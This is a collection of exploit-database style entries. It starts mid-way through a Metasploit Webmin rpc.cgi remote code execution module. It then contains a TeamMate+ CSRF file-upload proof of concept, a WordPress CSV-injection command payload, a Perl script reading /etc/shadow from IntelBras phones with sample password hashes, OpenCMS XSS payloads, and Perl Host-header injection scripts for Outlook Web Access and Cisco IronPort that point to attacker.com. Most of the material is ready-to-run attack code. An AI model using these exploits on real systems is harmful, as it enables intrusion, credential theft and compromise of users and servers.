    end

    # Verbose
    print_status("Checking if host is vulnerable")

    # Try to execute arbitrary code
    res = send_request_cgi({
'uri'          => '/rpc.cgi',
'method'       => 'POST',
'headers'      => 
        {
'Referer' => 'http://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s
        },
'data'   => 'OBJECT CGI;print "Content-Type: text/metasploit\n\n"',
'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid
      })

    # If it works our custom Content-Type will be set
    if ( res.headers['Content-Type'] and res.headers['Content-Type'] == "text/metasploit" )
      # Good
      return Exploit::CheckCode::Vulnerable
    else
      # Bad
      return Exploit::CheckCode::Safe
    end
  end

  def exploit

    # Set Webmin port
    datastore['RPORT'] = datastore['WMPORT']

    # Verbose
    print_status("Attempting to login")

    # Send login request
    res = send_request_cgi(
      {
'uri'       =>  '/session_login.cgi',
'method'    => 'POST',
'vars_post' =>
          {
'user' => datastore['WMUSER'],
'pass' => datastore['WMPASS'],
'save' => '1'
          },
'cookie' => "redirect=1; testing=1; sessiontest=1;"
      })

    # If succesful cookie will be set
    if ( res and res.headers['Set-Cookie'] )
      # Do we have a valid SID?
      if ( /sid=/.match(res.headers['Set-Cookie']) )
        # Extract the SID
        sid = /sid=([a-z0-9]+);/.match(res.headers['Set-Cookie'])[1]
        print_good("Login was successful")
      else
        # No dice
        print_bad("Unable to login")
        return
      end
    else
        # No dice
        print_bad("Unexpected response")
        return
    end

    # Verbose
    print_status("Sending selected payload")

    # Hex encode payload to prevent problems with the payload getting mangled
    hex = '\x' + payload.encoded.scan(/./).map{ |x| x.unpack('H*') }.join('\x')

    # Send selected payload
    res = send_request_cgi({
'uri'          => '/rpc.cgi',
'method'       => 'POST',
'headers'      => 
        {
'Referer' => 'https://' + datastore['RHOST'] + ':' + datastore['RPORT'].to_s
        },
'data'   => 'OBJECT CGI;`' + hex + '`',
'cookie' => 'redirect=1; testing=1; sessiontest=1; sid=' + sid
      })
    end
end

Title:
====

Wolters Kluwer TeamMate+ – Cross-Site Request Forgery (CSRF) vulnerability


Credit:
======

Name: Bhadresh Patel


CVE:

====

CVE-2019-10253

Date:
====

19/03/2019 (dd/mm/yyyy)

Vendor:
======

Wolters Kluwer is a global leader in professional information, software solutions, and services for the health, tax & accounting, finance, risk & compliance, and legal sectors. We help our customers make critical decisions every day by providing expert solutions that combine deep domain knowledge with specialized technology and services.

Vendor link: http://www.teammatesolutions.com/about-us.aspx


Vulnerable Product:
==============

TeamMate+


TeamMate Global Audit Solutions, part of the Tax and Accounting Division of Wolters Kluwer, helps professionals in all industries at organizations around the world manage audit and compliance risks and business issues by providing targeted, configurable, and efficient software solutions. Solutions include TeamMate+ Audit, TeamMate+ Controls, and TeamMate Analytics. Together, this ecosystem of solutions provides organizations with the combined assurance they need to manage all aspects of risk identification and assessment, electronic working paper creation and management, controls framework management, and data analysis.



Abstract:
=======

Cross-Site Request Forgery (CSRF) vulnerability in TeamMate+ could allow an attacker to upload malicious/forged files on TeamMate server or replace existing uploaded files with malicious/forged files by enticing authenticated user to visit attacker page.


Report-Timeline:

=============

19/03/2019: Vendor notified

19/03/2019: Vendor responded requesting further information

20/03/2019: Further technical information with PoC was shared with vendor

01/07/2019: Vendor fixed the issue in version 3.2


Affected Software Version:
=============

<= TeamMate January 2019 (Version 3.1) (Internal Version: 21.0.0.0)


Exploitation-Technique:
===================

Remote


Severity Rating (CVSS):
===================

4.3 (Medium) (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N)


CVE ID:

=======


CVE-2019-10253


Details:
=======

A Cross-Site Request Forgery (CSRF) vulnerability is discovered in TeamMate+ which allows a remote attacker to modify application data (upload malicious/forged files on TeamMate server or replace existing uploaded files with malicious/forged files) without victim's knowledge by enticing authenticated user to visit attacker page/URL.


The specific flaw exists within the handling of request to “DomainObjectDocumentUpload.ashx” application. An application failed to validate CSRF token before handling the POST request.


Vulnerable module/page/application: /TeamMate/Upload/DomainObjectDocumentUpload.ashx



PoC Exploit code:
----------------------------------------------------------------------------



<html>



<body onload="submitRequest()">

<script>

      function submitRequest()

      {

        var xhr = new XMLHttpRequest();

        xhr.open("POST", "https://<ServerIP>/TeamMate/Upload/DomainObjectDocumentUpload.ashx", true);

        xhr.setRequestHeader("Accept", "text/html, */*; q=0.01");

        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.9,ar;q=0.8");

        xhr.setRequestHeader("Content-Type", "multipart/form-data; boundary=----WebKitFormBoundaryNA930lURoQYsoTOn");

        xhr.withCredentials = true;

        var body = "------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"fileObjectId\"\r\n" +

"\r\n" +

"0\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"parentId\"\r\n" +

"\r\n" +

"1373\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"AssessmentId\"\r\n" +

"\r\n" +

"34\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"ProjectId\"\r\n" +

"\r\n" +

"1106\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"ParentNodeType\"\r\n" +

"\r\n" +

"50\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"DocumentParentObjectType\"\r\n" +

"\r\n" +

"90\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn\r\n" +

"Content-Disposition: form-data; name=\"files[]\"; filename=\"Report.txt\"\r\n" +

"Content-Type: application/x-msdownload\r\n" +

"\r\n" +

"MZP\r\n" +

"------WebKitFormBoundaryNA930lURoQYsoTOn--\r\n";

        var aBody = new Uint8Array(body.length);

        for (var i = 0; i < aBody.length; i++)

          aBody[i] = body.charCodeAt(i);

        xhr.send(new Blob([aBody]));

      }

</script>



</body>

</html>



----------------------------------------------------------------------------


Credits:
=======

Bhadresh Patel

# Exploit Title: WordPress Plugin Event Tickets >= 4.10.7.1 - CSV Injection
# Google Dork: inurl:"\wp-content\plugins\event-tickets"
# Date: 09-01-2019
# Exploit Author: MTK (http://mtk911.cf/)
# Vendor Homepage: https://tri.be/
# Software Link: https://downloads.wordpress.org/plugin/event-tickets.4.10.7.1.zip
# Version: Up to v4.107.1
# Tested on: Apache2/WordPress 5.2.2 - Firefox/Windows

# Software description:
Event Tickets provides a simple way for visitors to RSVP or purchase tickets to your events. As a standalone plugin, it enables you to add RSVPs or tickets to posts or pages. When paired with The Events Calendar, you can add that same functionality directly to your event listings.

# Technical Details & Impact:
It's possible to run malicious command on logged in user computer. Even though an alert message is shown on opening the file but users usually ignore such pop-ups since file is from known source.

# POC

1.   Visit RSVP ticket enabled page
2.  In Full name section add payload for CSV injection e.g.
=cmd|'/C ping -t 127.0.0.1'!A0
3.  Login into WordPress and visit event details in All Post> Ticketed > Attendees. 
4.  Export Attendees list (.csv format).
5.  Opening the file will execute malicious payload (command) on user system


# Timeline
02-08-2019 - Vulnerability discovered
02-08-2019 - Vendor contacted
02-08-2019 - Vendor responded
02-08-2019 - Detailed report shared
02-18-2019 - Contacted vendor on fixation status without any response 
08-26-2019 - Full disclosure timeline given without any response
09-01-2019 - Full Disclosure

#!/usr/bin/perl -w
#
#  IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#
#  Todor Donev 2019 (c) <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#  [test@localhost intelbras]$ perl intelbras_telefone_ip_tip_200_200_lite.pl 
#
#  # IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 'dumpConfigFile' Pre-Auth Remote Arbitrary File Read
#  # ========================================================================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # ========================================================================================================
#  # >  Authorization => Basic dXNlcjp1c2Vy
#  # >  User-Agent => Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Accept-Ranges => bytes
#  # <  Server => SIPPhone
#  # <  Content-Type => text/html;charset=UTF-8
#  # <  Expires => -1
#  # <  Client-Date => Sun, 01 Sep 2019 13:37:00 GMT
#  # <  Client-Peer => 192.168.1.1
#  # <  Client-Response-Num => 1
#  # ========================================================================================================
#  root:$1$IJZx7biF$BgyHlA/AgR27VSEBALpqn1:11876:0:99999:7:::
#  admin:$1$Bwt9zCNI$7rGLYt.wk.axE.6FUNFZe.:11876:0:99999:7:::
#  guest:$1$A3lIJ0aO$Is8Ym.J/mpNejleongGft.:11876:0:99999:7:::
#
#  # ========================================================================================================
#  [test@localhost intelbras]$ 
# 
#  Simple Mode:
#  perl intelbras_telefone_ip_tip_200_200_lite.pl | grep -v "^#"
#
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;

my $host = shift || '';
my $file = shift || '/etc/shadow';
my $user = shift || 'user';
my $pass = shift || 'user';

print "
# IntelBras TELEFONE IP TIP200/200 LITE 60.61.75.15 \'dumpConfigFile\' Pre-Auth Remote Arbitrary File Read
# ========================================================================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ /etc/shadow user user
# e.g. perl $0 https://target:port/ /phone/factory/user.ini user user
# e.g. perl $0 https://target:port/ /phone/config/WebItemsLevel.cfg user user
# e.g. perl $0 https://target:port/ /phone/config/.htpasswd user user
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);
my $payload = $host."/cgi-bin/cgiServer.exx?command=dumpConfigFile(\"$file\")";
my $request = HTTP::Request->new (GET => $payload,[ Content_Type => "application/x-www-form-urlencoded"], "");
$request->authorization_basic($user, $pass);
print "# ========================================================================================================\n";
my $response = $browser->request($request);
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# 401 Unauthorized! Wrong Username or Password!\n" and exit if ($response->code eq '401');
print "# ========================================================================================================\n";

if ($response->content =~ m/$file/g){

        my $content = $response->content;
        $content =~ s/$file//g;
        $content =~ s/^\n+//;
        print $content;
        print "\n# ========================================================================================================\n";
        exit;

} else {

        print "# Exploit failed or full path is wrong..\n";
        exit;

}

# Exploit Title: Alkacon OpenCMS 10.5.x - Multiple XSS in Apollo Template
# Google Dork: N/A
# Date: 18/07/2019
# Exploit Author: Aetsu
# Vendor Homepage: http://www.opencms.org
# Software Link: https://github.com/alkacon/apollo-template
# Version: 10.5.x
# Tested on: 10.5.5 / 10.5.4
# CVE : CVE-2019-13234, CVE-2019-13235

1. Reflected XSS in the search engine:
- Affected resource -> "q"
POC:
```
https://example.com/apollo-demo/search/index.html?facet_category_exact_ignoremax&q=demo%20examplez4e62%22%3e%3cscript%3ealert(1)%3c%2fscript%3ewhhpg&facet_type_ignoremax&facet_search.subsite_exact_ignoremax&reloaded&facet_query_query_ignoremax&
```
2. Reflected XSS in login form:
POC:
The vulnerability appears when the header X-Forwarded-For is used as shown
in the next request:
```
GET
/login/index.html?requestedResource=&name=Editor&password=editor&action=login
HTTP/1.1
Host: example.com
X-Forwarded-For: .<img src=. onerror=alert('XSS')>.test.ninja
```


Extended POCs: https://aetsu.github.io/OpenCms

#!/usr/bin/perl -w
#
#  Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#   [test@localhost microsoft_owa]$ perl microsoft_owa.pl https://133.71.33.37/
#   [+] Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit
#   =======================================================================================
#   [!] Author: Todor Donev <todor.donev@gmail.com>
#   =======================================================================================
#   [+] >  Host: sultan-of-swing
#   [+] >  User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.6) Gecko/20040406 Galeon/1.3.15
#   [+] >  Content-Type: application/x-www-form-urlencoded
#   [+] <  Cache-Control: no-cache
#   [+] <  Connection: close
#   [+] <  Date: Sat, 31 Aug 0000 13:37:00 GMT
#   [+] <  Pragma: no-cache
#   [+] <  Location: https://sultan-of-swing/owa/
#   [+] <  Server: Microsoft-IIS/10.0
#   [+] <  Content-Length: 0
#   [+] <  Client-Date: Sat, 31 Aug 0000 13:37:00 GMT
#   [+] <  Client-Peer: 133.71.33.37:443
#   [+] <  Client-Response-Num: 1
#   [+] <  Client-SSL-Cert-Issuer: CENSORED
#   [+] <  Client-SSL-Cert-Subject: CENSORED
#   [+] <  Client-SSL-Cipher: ECDHE-RSA-AES128-GCM-SHA256
#   [+] <  Client-SSL-Socket-Class: IO::Socket::SSL
#   [+] <  Client-SSL-Warning: Peer certificate not verified
#   [+] <  X-FEServer: MAILSVRTEST
#   [+] <  X-RequestId: CENSORED
#  =======================================================================================
#   [+] Microsoft OWA Location is Injected => https://sultan-of-swing/owa/
#
#  Description:
#  OWASP Testing for HTTP Splitting/Smuggling (OTG-INPVAL-016)
#  https://www.owasp.org/index.php/Testing_for_HTTP_Splitting/Smuggling_(OTG-INPVAL-016)
#
#

use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || 'https://192.168.1.1:443/';

printf ("[+] Microsoft Outlook Web Access build:15.1.1591 Remote Header 'Host' Injection Exploit\n");
printf ("=======================================================================================\n");
printf ("[!] Author: Todor Donev <todor.donev\@gmail.com>\n");
printf ("[?] e.g. perl $0 https://target:port/\n") and exit if ($host !~ m/^http/);

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,
                                  [ Content_Type => "application/x-www-form-urlencoded" ,
                  Host => "sultan-of-swing"], "");
printf ("=======================================================================================\n");
my $response = $browser->request($request);
if ($response->header('Location') =~ m/sultan-of-swing/i){

  say "[+] >  $_: ", $request->header($_) for  $request->header_field_names;
  say "[+] <  $_: ", $response->header($_) for  $response->header_field_names;
  printf ("=======================================================================================\n")
  printf ("[+] Microsoft OWA Location is Injected => %s\n", $response->header('Location'));
  exit;

} else {

  printf ("[-] Exploit failed!\n");
  exit;

}

#!/usr/bin/perl -w
#
#
#  Cisco IronPort C150 Remote Header 'Host' Injection
#
#
#  Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
#  Disclaimer:
#  This or previous programs are for Educational purpose ONLY. Do not use it without permission. 
#  The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages 
#  caused by direct or indirect use of the  information or functionality provided by these programs. 
#  The author or any Internet provider  bears NO responsibility for content or misuse of these programs 
#  or any derivatives thereof. By using these programs you accept the fact  that any damage (dataloss, 
#  system crash, system compromise, etc.) caused by the use  of these programs are not Todor Donev's 
#  responsibility.
#   
#  Use them at your own risk!
#
#
#
#       [test@localhost ironport]$ perl ironport_c150.pl https://192.168.1.1 attacker.com
#  # Cisco IronPort C150 Remote Header 'Host' Injection
#  # ==================================================
#  # Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
#  # >  Host => attacker.com
#  # >  User-Agent => iCab/4.0 (Macintosh; U; Intel Mac OS X)
#  # >  Content-Type => application/x-www-form-urlencoded
#  # <  Cache-Control => no-store,no-cache,must-revalidate,max-age=0,post-check=0,pre-check=0
#  # <  Date => Mon, 02 Sep 2019 07:42:12 GMT
#  # <  Pragma => no-cache
#  # <  Location => https://attacker.com/login?CSRFKey=c7103f80-977a-a61e-eecb-84717e621136&referrer=https%3A%2F%2Fattacker.com%2FSearch
#  # <  Server => glass/1.0 Python/2.6.4
#  # <  Content-Type => text/html
#  # <  Expires => Mon, 02 Sep 2019 07:42:12 GMT
#  # <  Last-Modified => Mon, 02 Sep 2019 07:42:12 GMT
#  # <  Client-Date => Mon, 02 Sep 2019 07:42:13 GMT
#  # <  Client-Peer => 192.168.1.1:443
#  # <  Client-Response-Num => 1
#  # <  Client-SSL-Cert-Issuer => 
#  # <  Client-SSL-Cert-Subject => 
#  # <  Client-SSL-Cipher => DHE-RSA-AES128-GCM-SHA256
#  # <  Client-SSL-Socket-Class => IO::Socket::SSL
#  # <  Client-SSL-Warning => Peer certificate not verified
#  # <  Refresh => 0; URL=https://attacker.com/login?CSRFKey=c7103f80-977a-a61e-eecb-84717e621136&referrer=https%3A%2F%2Fattacker.com%2FSearch
#  # <  Set-Cookie => sid=6t67zdL9tSW0mcqetPC0; expires=Wednesday, 04-Sep-2019 07:42:12 GMT; httponly; Path=/; secure
#  # <  Title => : Redirecting
#  # <  X-Frame-Options => SAMEORIGIN
#  # ==================================================
#  # IronPort is Poisoned => https://attacker.com/login?CSRFKey=c7103f80-977a-a61e-eecb-84717e621136&referrer=https%3A%2F%2Fattacker.com%2FSearch
#
#  
use strict;
use v5.10;
use HTTP::Request;
use LWP::UserAgent;
use WWW::UserAgent::Random;


my $host = shift || '';
my $attacker = shift || 'attacker.com';


print "# Cisco IronPort C150 Remote Header 'Host' Injection
# ============================================================
# Author: Todor Donev 2019 (c) <todor.donev at gmail.com>
";
if ($host !~ m/^http/){
print  "# e.g. perl $0 https://target:port/ attacker.com
";
exit;
}

my $user_agent = rand_ua("browsers");
my $browser  = LWP::UserAgent->new(
                                        protocols_allowed => ['http', 'https'],
                                        ssl_opts => { verify_hostname => 0 }
                                );
   $browser->timeout(10);
   $browser->agent($user_agent);

my $request = HTTP::Request->new (POST => $host,[Content_Type => "application/x-www-form-urlencoded"], "");
$request->header("Host" => $attacker);
my $response = $browser->request($request);
print "# 401 Unauthorized!\n" and exit if ($response->code eq '401');
say "# >  $_ => ", $request->header($_) for  $request->header_field_names;
say "# <  $_ => ", $response->header($_) for  $response->header_field_names;
print "# ============================================================\n";
if (defined ($response->header('Location')) and ($response->header('Location') =~ m/$attacker/i)){
  printf ("# IronPort is Poisoned => %s\n", $response->header('Location'));
  exit;

} else {

  printf ("# Exploit failed!\n");
  exit;

}